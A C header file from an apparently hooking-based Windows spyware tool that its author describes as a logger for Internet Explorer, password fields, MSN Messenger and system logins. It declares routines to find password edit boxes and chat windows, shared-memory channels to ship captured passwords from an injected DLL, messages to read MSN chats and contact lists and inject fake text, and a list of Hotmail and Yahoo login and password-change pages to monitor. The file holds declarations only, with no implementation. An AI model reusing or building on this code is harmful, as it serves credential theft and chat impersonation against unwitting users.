#ifndef MSCOMDEF_X
#define MSCOMDEF_X

/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/

#include <windows.h>
#include <tchar.h>

void ReportErr(LPCTSTR str);

#include <stdio.h> 
void PopMsg(LPCTSTR pszFormat, ...) ;

//Various Target Window
BOOL IsMSNChat(HWND hWnd);
BOOL IsMSNMain(HWND hWnd);
//Check the Edit Array and Confirm they are password edit, if not, NULL it
BOOL IsPasswordEdit(HWND hEdit);
BOOL IsBrowser(HWND hWnd);

#define MAX_PWD_EDIT 20   //Maximum tracking 100 password dialog
#define MAX_CONCUR_CHAT 10      //Maximum concurrent chat by MSN ( 10 by default ) 
#define MAX_BROWSER   100  //track max 100 browser at one time!!!


#define MAX_WAIT 500      //Hook side Max waiting time 

#define NightmareMMFSize  1024 * 1024  //1 Mb
#define NightmarePage     64 * 1024  //Win2000 ---- 1 Page = 64 Kb 


//MMF to transfer password editbox and its sibling, MSN, IE, etc...
#define g_MMF_NAME  _T("{AF60EB27-C70A-4f36-8D68-6FEA9998C884}") //place holder
#define g_READ_EVENT_MMF_NAME  _T("{85B7FBAC-D46B-40ae-A604-FD28168D3A8B}") //if set client go
#define g_WRITE_EVENT_MMF_NAME  _T("{48208702-377D-4c54-A13F-7D62A16E4714}") //if set Dll go


#define WPARAM_CLEAR_PREVIOUS_TEXT   0x123  //Flag wParam to Clear Low Richedit Ctrl in Chat Window
#define LPARAM_SEND_TEXT_INSTANTLY   0x456  //Flag lParam to Send Fake Text in Low Richedit Ctrl Instantly

#define WM_MSNSPOOK_SENDTEXT         WM_USER + 123
#define WM_MSNSPOOK_QUERYTEXT        WM_USER + 456 
#define WM_MSNSPOOK_QUERYCONTACTLIST WM_USER + 789

//chatter name buffer max length
#define MAX_CHATTER_ADDRESS  255

typedef enum tagEnumPreDefinePage
{
	none = -1,
	//hotmail
	hotmailInbox = 0,
	hotmailCompose,
	hotmailLogin,
	hotmailLogError,
    hotmailContacts,
	hotmailChangePassword,
	hotmailChangeAnswer,
	hotmailForgotPassword,
	hotmailReadMail,
	//yahoo
	yahooInbox,
	yahooCompose,
	yahooLogin,
	yahooLogError,
	yahooContacts,
	yahooChangePassword,
	yahooChangeAnswer,
	yahooForgotPassword,
	yahooReadMail,
	//more on your definition
	yourCoolSite = 200    
} enumPreDefinePage;

#define WM_QUERY_BROWSER          WM_USER + 330 //
//wParam: 0 -- Query Html 1 -- Query URL ....
//lParam: Not Used 
#define WM_WPARAM_QUERY_HTML   1   //by PostMessage
#define WM_WPARAM_QUERY_URL    2   //by PostMessage
#define WM_WPARAM_QUERY_TITLE  4   //by PostMessage
#define WM_WPARAM_CHECK_ISPWD  8   //by SendMessage
#define WM_WPARAM_CHECK_ISPREDEF 16 //by SendMessage

#define WM_TRIGGER_BROWSER          WM_USER + 331 //

#endif